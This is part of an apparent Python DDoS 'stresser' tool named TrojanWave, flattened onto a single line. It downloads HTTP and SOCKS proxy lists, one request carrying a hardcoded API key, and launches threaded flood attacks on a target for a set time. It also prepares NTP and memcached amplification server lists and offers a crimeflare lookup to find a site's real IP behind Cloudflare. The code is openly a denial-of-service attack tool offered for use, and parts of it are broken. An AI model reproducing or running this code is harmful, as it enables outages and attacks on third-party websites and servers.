try: r = requests.get( "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=socks5&lastchecked=60", timeout=5) f.write(r.content) except: pass try: r = requests.get( "https://gist.githubusercontent.com/Azuures/1e0cb7a1097c720b4ed2aa63acd82179/raw/97d2d6a11873ffa8ca763763f7a5dd4035bcf95f/fwefnwex", timeout=5) f.write(r.content) f.close() except: f.close() if choice == "1": f = open(out_file, 'wb') try: r = requests.get("https://api.proxyscrape.com/?request=displayproxies&proxytype=http&country=all", timeout=5) f.write(r.content) except: pass try: r = requests.get("https://www.proxy-list.download/api/v1/get?type=http", timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://www.proxyscan.io/download?type=http", timeout=5) f.write(r.content) f.close() except: pass try: r = requests.get("https://raw.githubusercontent.com/TheSpeedX/PROXY-List/master/http.txt", timeout=5) f.write(r.content) except: pass try: r = requests.get( "https://proxy-daily.com/api/getproxylist?apikey=3Rr6lb-yfeQeotZ2-9M76QI&format=ipport&type=http&lastchecked=60", timeout=5) f.write(r.content) f.close() except: f.close() def main(): global proxies, multiple, choice, timer, out_file method = str(sys.argv[1]).lower() out_file = str("files/proxys/" + sys.argv[5]) if not os.path.exists(out_file): makefile(out_file) if method == "check": proxydl(out_file, socks_type) exit() if method == "stop": url = str(sys.argv[2]).strip() UrlFixer(url) stop() elif (method == "help") or (method == "h"): usge() elif (method == "check"): pass elif str(method.upper()) not in str(methods): print("method not found") exit() timer = int(time.time()) + int(sys.argv[7]) url = str(sys.argv[2]).strip() UrlFixer(url) choice = str(sys.argv[3]).strip() if choice != "4" and choice != "5" and choice != "1": print("Socks Type Not Found [4, 5, 1]") exit() if choice == "4": socks_type = 4 elif choice == "1": socks_type = 1 else: socks_type = 5 threads = int(sys.argv[4]) proxies = open(out_file).readlines() if method == "slow": conn = threads proxydl(out_file, socks_type) print("{} Attack Started To {}:{} For {} Seconds With {}/{} Proxy ".format(method, target, port, sys.argv[7],len(proxies), str(nums))) for _ in range(conn): threading.Thread(target=slow, args=(conn, socks_type), daemon=True).start() else: multiple = str((sys.argv[6])) if multiple == "": multiple = int(100) else: multiple = int(multiple) event = threading.Event() start_attack(method, threads, event, socks_type) event.clear() event.set() while True: try: sleep(0.1) except KeyboardInterrupt: break def proxydl(out_file, socks_type): global proxies, multiple, choice, data ms = 1 if socks_type == 1: socktyper = "HTTP" if socks_type == 4: socktyper = "SOCKS4" if socks_type == 5: socktyper = "SOCKS5" print("downloading {}'s proxy plz wait".format(socktyper)) downloadsocks(choice) proxies = open(str(out_file)).readlines() check_list(out_file) check_socks(ms) bds = 0 # layer tool :|||||||||||| def toolgui(): global bds tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n") if bds == 0: print(''' Tools: ''' + tos+ ''' Other: Clear Exit ''') bds = 1 tool = input(socket.gethostname() + "@"+name+":~# ").lower() if tool != "e" and (tool != "exit") and (tool != "q") and (tool != "quit") and (tool != "logout") and ( tool != "close"): pass else: exit() if tool == "cfip": domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') cfip(domain) return tools() elif tool == "dstat": print(tool + ": command ready") return tools() elif tool == "dns": return tools() elif tool == "check": domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') check(domain) return tools() elif tool == "ping": domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') piger(domain) return tools() elif tool == "info": domain = input(socket.gethostname() + '@'+name+'}:~/give-me-ipaddress# ') piger(domain) return tools() elif (tool == "help") or (tool == "h") or (tool == "?"): tos = str(to).replace("'", "").replace("[", "").replace("]", "").replace(",", "\n") print(''' Tools: {tos} Other: Clear Exit ''') return tools() elif (tool == "cls") or (tool == 'clear') or (tool == 'c'): print("\033[H\033[J") return tools() elif not tool: return tools() elif " " in tool: return tools() elif " " in tool: return tools() elif " " in tool: return tools() elif "\n" in tool: return tools() elif "\r" in tool: return tools() else: print(tool + ": command not found") return tools() def tools(): global domain, name name = "TrojanWave" try: tool = sys.argv[2].lower() if tool != "dstat": domain = sys.argv[3] if str('.') not in str(domain): print('address not found') toolgui() if tool == "cfip": cfip(domain) elif tool == "dns": print(tool + ": comming soon !") elif tool == "check": check(domain) elif tool == "ping": piger(domain) elif tool == "dstat": address = requests.get('http://ipinfo.io/ip', headers={"User-Agent": UserAgent, }).text print('now please attack to {address}') os.system('dstat') else: print('tool not found') toolgui() except IndexError: toolgui() def cfip(domain): if str("http") in str(domain): domain = domain.replace('https://', '').replace('http:', '').replace('/') URL = "http://www.crimeflare.org:82/cgi-bin/cfsearch.cgi" r = requests.post(URL, data={"cfS": {domain}}, headers={"User-Agent": UserAgent, }, timeout=1) print(r.text) def check(domain): if str("http") not in str(domain): domain = "http://" + domain print('please wait ...') r = requests.get(domain, timeout=20) if str("50") in str(r.status_code): die = "OFFLINE" else: die = "ONLINE" print('\nstatus_code: '+r.status_code) print('status: '+die+'\n') def piger(siye): if str("https") in str(siye): domain = str(siye).replace('https', '').replace('/', '').replace(':', '') elif str("http") in str(siye): domain = str(siye).replace('http', '').replace('/', '').replace(':', '') else: domain = str(siye) print('please wait ...') r = pig(domain, count=5, interval=0.2) if r.is_alive: die = "ONLINE" else: die = "OFFLINE" print('\nAddress: '+r.address) print('Ping: '+r.avg_rtt) print('Aceepted Packets: '+r.packets_received+'/'+r.packets_sent) print('status: '+die+'\n') def usgeaseets(): global metho, url, SOCKST, thr, proxylist, muli, tim, l7s, l4s, tos, ots, l3s socks = ["1", "4", "5"] sockst = ["socks4.txt", "socks5.txt", "http.txt"] try: if sys.argv[3] not in socks: SOCKST = Choice(socks) elif sys.argv[3]: SOCKST = sys.argv[3] else: SOCKST = Choice(socks) except: SOCKST = Choice(socks) if (str(SOCKST) == str('1')): proxylist = "http.txt" else: proxylist = "socks{0}.txt".format(SOCKST) try: met = str(sys.argv[1]).upper() if met not in list(methods): metho = Choice(methods).lower() elif sys.argv[1]: metho = sys.argv[1] else: metho = Choice(methods).lower() except: metho = Choice(methods).lower() try: methos = metho.upper() if (methos in l4) or (methos in l3): url = sys.argv[2] elif str("http") not in sys.argv[2]: url = "https://example.ir" elif sys.argv[2]: url = sys.argv[2] else: url = "https://example.ir" except: url = "https://example.ir" try: if sys.argv[4]: thr = sys.argv[4] else: thr = Intn(100, 1000) except: thr = Intn(10, 1000) try: if (sys.argv[5] not in sockst): exit() except IndexError: pass except: print('socks type not found') exit() try: if sys.argv[6]: muli = sys.argv[6] else: muli = Intn(5, 100) except: muli = Intn(5, 100) try: if sys.argv[7]: tim = sys.argv[7] else: tim = Intn(10, 10000) except: tim = Intn(10, 10000) l4s = str(l4).replace("'", "").replace("[", "").replace("]", "") l3s = str(l3).replace("'", "").replace("[", "").replace("]", "") l7s = str(l7).replace("'", "").replace("[", "").replace("]", "") tos = str(to).replace("'", "").replace("[", "").replace("]", "") ots = str(ot).replace("'", "").replace("[", "").replace("]", "") def usge(): usgeaseets() print('* Coded By MH_ProDev For Better Stresser') print('python3 {} \n'.format(sys.argv[0])) print(' > Methods:') print(' - L3') print(' | {} | {} Methods'.format(l3s, len(l3))) print(' - L4') print(' | {} | {} Methods'.format(l4s, len(l4))) print(' - L7') print(' | {} | {} Methods'.format(l7s, len(l7))) print(' - TOOLS') print(' | {} | {} Methods'.format(tos, len(to))) print(' - Other') print(' | {} | {} Methods'.format(ots, len(ot))) print(' - All {} Method \n'.format(len(methodsl))) print( 'expmple:\n python3 {} {} {} {} {} {} {} {}'.format(sys.argv[0], metho, url, SOCKST, thr, proxylist, muli, tim)) def makefile(text): if text == "files/": os.mkdir(text) elif text == "files/proxys/": os.mkdir(text) else: open(text, 'w').close() print('File: ', text) if __name__ == '__main__': import os, requests, socket, socks, time, random, threading, sys, ssl, datetime, cfscrape, re from time import sleep from icmplib import ping as pig from scapy.layers.inet import TCP from scapy.all import * from socket import gaierror acceptall = [ "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", "Accept-Encoding: gzip, deflate", "Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate", "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Charset: iso-8859-1Accept-Encoding: gzip", "Accept: application/xml,application/xhtml+xml,text/html;q=0.9, text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1Accept-Charset: utf-8, iso-8859-1;q=0.5", "Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/x-shockwave-flash, application/msword, */*Accept-Language: en-US,en;q=0.5", "Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Encoding: gzipAccept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Encoding: gzipAccept-Language: en-US,en;q=0.5Accept-Charset: utf-8, iso-8859-1;q=0.5," "Accept: text/html, application/xhtml+xml, application/xml;q=0.9, */*;q=0.8Accept-Language: en-US,en;q=0.5", "Accept-Charset: utf-8, iso-8859-1;q=0.5Accept-Language: utf-8, iso-8859-1;q=0.5, *;q=0.1", "Accept: text/html, application/xhtml+xml", "Accept-Language: en-US,en;q=0.5", "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: br;q=1.0, gzip;q=0.8, *;q=0.1", "Accept: text/plain;q=0.8,image/png,*/*;q=0.5Accept-Charset: iso-8859-1", ] data = "" strings = "asdfghjklqwertyuiopZXCVBNMQWERTYUIOPASDFGHJKLzxcvbnm1234567890" Intn = random.randint Choice = random.choice if not os.path.exists('files/'): makefile('files/') if not os.path.exists('files/proxys/'): makefile('files/proxys/') if not os.path.exists('files/useragent.txt'): makefile('files/proxys/useragent.txt') if not os.path.exists('files/ntp_servers.txt'): makefile('files/ntp_servers.txt') if not os.path.exists('files/memcached_servers.txt'): makefile('files/memcached_servers.txt') if not os.path.exists('files/referers.txt'): makefile('files/referers.txt') try: with open("files/useragent.txt", "r") as f: readuser = str(f.readlines()).replace('\n', '').replace('\r', '') with open("files/referers.txt", "r") as f: readref = str(f.readlines()).replace('\n', '').replace('\r', '') with open("files/memcached_servers.txt", "r") as f: memsv = str(f.readlines()).replace('\n', '').replace('\r', '') with open("files/ntp_servers.txt", "r") as f: ntpsv = str(f.readlines()).replace('\n', '').replace('\r', '') UserAgent = Choice(readuser) referers = Choice(readref) memcached_servers = Choice(memsv) try: bdr = str(sys.argv[1]).lower() if bdr == "tools": tools() elif bdr == "stop": stop() elif bdr == "help": usge() elif len(sys.argv) <= int(7): usge() else: main() except IndexError: usge() except KeyboardInterrupt: sys.exit() except IndexError: usge()